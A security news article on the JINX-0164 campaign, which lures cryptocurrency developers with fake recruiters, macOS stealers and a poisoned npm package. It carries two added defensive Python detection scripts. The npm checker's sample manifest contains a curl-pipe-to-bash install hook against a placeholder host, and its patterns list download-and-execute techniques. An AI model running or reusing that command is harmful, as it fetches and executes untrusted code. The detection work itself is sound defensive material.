JINX-0164 Targets Cryptocurrency Firms with Fake Recruiter Lures and macOS Malware

The Hacker News
May 28, 2026

Ravie Lakshmanan | Supply Chain Attack / Malware

A previously undocumented threat actor has been targeting cryptocurrency organizations in a campaign that combines recruitment-themed social engineering with bespoke macOS malware, with the end goal of stealing digital assets.

“These campaigns leveraged sophisticated social engineering techniques, custom macOS malware, and deep targeting of CI/CD infrastructure,” Wiz researchers Shira Ayal, Eden Abergil, Andre Maccarone, Yuval Dan, and Benjamin Read said. “The methods used enabled the threat actor to move laterally from compromised employee laptops to code distribution systems and development infrastructure.”

The Google-owned cloud security company is tracking the activity under the moniker JINX-0164. The actor is assessed to have been active since at least mid-2025 and to be financially motivated, targeting developers with recruitment-themed and other social engineering lures in order to steal cryptocurrency. In at least one case, the adversary is said to have carried out a supply chain attack.

In the attack chain documented by Wiz, JINX-0164 approaches victims from credible-looking LinkedIn profiles and offers a virtual meeting. The meeting invite is designed to steer the target to a rogue domain that masquerades as a teleconference provider.

From there, victims are tricked into downloading and installing what is presented as the meeting client. The installer runs a bash script hosted on a fake driver-store domain (“apple.driver-store[.]com”), which in turn retrieves a Python-based macOS information stealer and remote access trojan codenamed AUDIOFIX.

“The [bash] script downloaded an architecture-aware payload from the same domain, compatible with both Intel and Apple Silicon systems. The payload masqueraded as a system audio driver named coreaudiod, was saved as ChromeUpdater, and was executed via launchctl,” Wiz said.

The Python malware is then used to steal sensitive data from the compromised endpoint, move laterally to internal code distribution systems and development infrastructure by injecting the AUDIOFIX payload into them, and modify source code in an attempt to compromise further endpoints and steal cryptocurrency wallet credentials.
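The persistence detail above (a payload that borrows the name of Apple's real coreaudiod daemon, is dropped under a user-writable path as ChromeUpdater, and is started through launchctl) is exactly the shape a launchd hunt on macOS should catch. The following Python script is an added example written for this article; it is not Wiz's tooling or anything recovered from the campaign, and the plist contents, labels and paths in it are constructed to mirror the described pattern rather than copied from published indicators.

```python
"""Hunt macOS launchd items whose label or binary imitates an Apple service.

Added illustration: the rules and sample plists below are constructed for this
article and are not indicators published by Wiz.
"""
import plistlib
import re
from pathlib import Path

# Paths from which an Apple-named service should legitimately be launched.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/Library/Apple/", "/Applications/")
# Labels or binary names that borrow Apple branding (coreaudiod is the real audio daemon).
APPLE_LOOKALIKE = re.compile(r"coreaudiod|com\.apple\.|apple", re.IGNORECASE)
# Locations a non-root user or an installer script can write to.
USER_WRITABLE = ("/Users/", "/tmp/", "/private/tmp/", "/var/folders/", "/private/var/")


def program_of(plist: dict) -> str:
    """Return the executable launchd will run (ProgramArguments[0], else Program)."""
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else str(plist.get("Program", ""))


def assess_launch_item(plist: dict) -> list[str]:
    """Return the reasons a LaunchAgent/LaunchDaemon dict looks like a disguised payload."""
    reasons: list[str] = []
    label = str(plist.get("Label", ""))
    program = program_of(plist)
    if not program:
        return ["no Program or ProgramArguments"]
    name = Path(program).name
    trusted = program.startswith(TRUSTED_PREFIXES)
    auto_start = bool(plist.get("RunAtLoad") or plist.get("KeepAlive"))
    if APPLE_LOOKALIKE.search(label) and not trusted:
        reasons.append(f"Apple-style label {label!r} runs non-system binary {program}")
    if APPLE_LOOKALIKE.search(name) and not trusted:
        reasons.append(f"binary {name!r} imitates an Apple daemon outside system paths")
    if auto_start and program.startswith(USER_WRITABLE):
        reasons.append(f"auto-started binary lives in user-writable path {program}")
    # A browser "updater" belongs inside that browser's install tree, not loose in a cache dir.
    if "updater" in name.lower() and not trusted:
        reasons.append(f"'updater' binary outside an application bundle: {program}")
    return reasons


def scan_plist_bytes(items: dict[str, bytes]) -> dict[str, list[str]]:
    """Parse raw plist XML (path -> bytes) and return only the items with findings."""
    findings: dict[str, list[str]] = {}
    for path, raw in items.items():
        try:
            plist = plistlib.loads(raw)
        except Exception:  # plistlib.InvalidFileException or an XML parse error
            findings[path] = ["unparseable plist"]
            continue
        reasons = assess_launch_item(plist)
        if reasons:
            findings[path] = reasons
    return findings


def scan_launch_dirs(home=None) -> dict[str, list[str]]:
    """Read the live LaunchAgents/LaunchDaemons directories on a macOS host."""
    home = Path(home) if home else Path.home()
    dirs = [home / "Library/LaunchAgents", Path("/Library/LaunchAgents"), Path("/Library/LaunchDaemons")]
    raw = {str(p): p.read_bytes() for d in dirs if d.is_dir() for p in d.glob("*.plist")}
    return scan_plist_bytes(raw)


# Constructed samples: a genuine-looking Apple daemon and one shaped like the ChromeUpdater drop.
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.audio.coreaudiod</string>
  <key>ProgramArguments</key><array><string>/usr/sbin/coreaudiod</string></array>
  <key>KeepAlive</key><true/>
</dict></plist>"""

DISGUISED = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.audio.coreaudiod</string>
  <key>ProgramArguments</key><array><string>/Users/dev/Library/Caches/ChromeUpdater</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

SAMPLE_PLISTS = {
    "/Library/LaunchDaemons/com.apple.audio.coreaudiod.plist": BENIGN,
    "/Users/dev/Library/LaunchAgents/com.apple.audio.coreaudiod.plist": DISGUISED,
}

if __name__ == "__main__":
    for path, reasons in scan_plist_bytes(SAMPLE_PLISTS).items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

The user-writable-path rule is deliberately noisy: legitimate third-party agents (browser and vendor updaters) also live under ~/Library, so in production it needs an allowlist of known vendor paths or a code-signature check on the binary. The label-versus-path rule is the high-signal one: nothing genuinely Apple should be launched from a user's cache directory.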

The captured data includes credentials from password managers, web browsers, and iCloud Keychain files; local admin credentials; SSH keys; configuration files; console history files; data from cryptocurrency browser extensions; cryptocurrency wallet addresses; and active Discord, Slack, and Telegram sessions.

Beyond information theft, AUDIOFIX supports several operator commands for manual reconnaissance, exfiltration, arbitrary shell command execution, file deletion, and retrieval of additional payloads from an external server.

JINX-0164 has also targeted software developers by impersonating recruiters, using the same technique: the job opportunity is used to set up a meeting that displays a fake technical error and instructs the victim to download a “fix”, which installs the malware.

Another key component of the actor's arsenal is MiniRAT, a Go-based backdoor previously distributed through a compromised version of the npm package @velora-dex/sdk, a legitimate DeFi toolkit used for token swaps, limit orders, and delta trading on the VeloraDEX decentralized exchange platform.

Per details shared by SafeDep and StepSecurity last month, the poisoned version downloaded a shell script from a remote server, which then delivered a macOS-specific binary called MiniRAT. The malware can upload files, run arbitrary shell commands, and fetch additional payloads or tools from attacker-controlled domains.
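A poisoned package release that pulls a shell script from a remote server at install time is the pattern a dependency gate should block before the script ever runs. The following Python checker is an added example for this article, not code from SafeDep, StepSecurity or the @velora-dex/sdk project. The page does not say which mechanism in the poisoned release triggered the download, so the npm lifecycle-hook vector it scans for is an assumption (it is the most common one); the two package.json manifests in it are constructed and the package names and URL are placeholders.

```python
"""Flag npm lifecycle scripts that download and execute remote code at install time.

Added illustration for this article. The page does not say how the poisoned
@velora-dex/sdk release triggered its download, so the install-hook vector
checked here is an assumption; the sample manifests are constructed, not copied
from the real package.
"""
import json
import re
from pathlib import Path

# Hooks npm/yarn/pnpm run automatically during install unless --ignore-scripts is set.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Each pattern names one building block of a download-and-execute chain.
PATTERNS = {
    "downloads a remote script": re.compile(r"\b(curl|wget)\b[^|;&]*https?://"),
    "pipes into a shell": re.compile(r"\|\s*(sh|bash|zsh)\b"),
    "decodes an embedded blob": re.compile(r"base64\s+(-d|--decode)|\batob\(|Buffer\.from\([^)]*['\"]base64"),
    "evaluates code at runtime": re.compile(r"\beval\(|\bnode\s+-e\b"),
    "stages a file in a temp dir": re.compile(r"/tmp/|\$TMPDIR|os\.tmpdir\(\)"),
}


def risky_hooks(package_json_text: str) -> list[tuple[str, str, str]]:
    """Return (hook, reason, script) for every lifecycle script matching a pattern."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    hits: list[tuple[str, str, str]] = []
    for hook in LIFECYCLE_HOOKS:
        script = scripts.get(hook)
        if not isinstance(script, str):
            continue
        for reason, pattern in PATTERNS.items():
            if pattern.search(script):
                hits.append((hook, reason, script))
    return hits


def scan_node_modules(root: Path) -> dict[str, list[tuple[str, str, str]]]:
    """Walk an installed tree and report every package whose hooks look risky."""
    report: dict[str, list[tuple[str, str, str]]] = {}
    for manifest in root.rglob("package.json"):
        try:
            hits = risky_hooks(manifest.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, OSError, UnicodeDecodeError):
            continue
        if hits:
            report[str(manifest.parent.relative_to(root))] = hits
    return report


# Constructed manifests. The first mimics a poisoned release that fetches a
# shell script at install time; the second builds a native addon locally.
SAMPLE_POISONED = json.dumps({
    "name": "example-dex-sdk", "version": "2.1.7",
    "scripts": {
        "postinstall": "curl -fsSL https://cdn.example.invalid/setup.sh | bash",
        "test": "jest",
    },
})
SAMPLE_CLEAN = json.dumps({
    "name": "example-native-addon", "version": "1.0.0",
    "scripts": {"install": "node scripts/build.js", "test": "mocha"},
})

if __name__ == "__main__":
    for sample in (SAMPLE_POISONED, SAMPLE_CLEAN):
        print(json.loads(sample)["name"], "->", risky_hooks(sample) or "clean")
```

Run `scan_node_modules(Path("node_modules"))` after a trial install in a throwaway container, or feed it the unpacked tarball of a new version before promoting it. Pattern matching like this is a tripwire, not a guarantee: a script can hide its fetch behind a required JS file, so the stronger control is to install with `--ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) and explicitly allow the few packages that genuinely need a build step.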

It’s worth noting that some aspects of the campaign, coupled with the use of VPN services such as Astrill VPN and the focus on cryptocurrency and developers, are reminiscent of tradecraft used by several North Korean threat clusters, including BlueNoroff, Contagious Interview, and UNC1069. However, Wiz said there are no infrastructure overlaps connecting JINX-0164 to Pyongyang at this stage.

“Similarly, the types of spoofing domains are similar to those used by other North Korean actors; however, JINX-0164 infrastructure does not have any overlaps with other publicly tracked North Korean groups,” Wiz said.
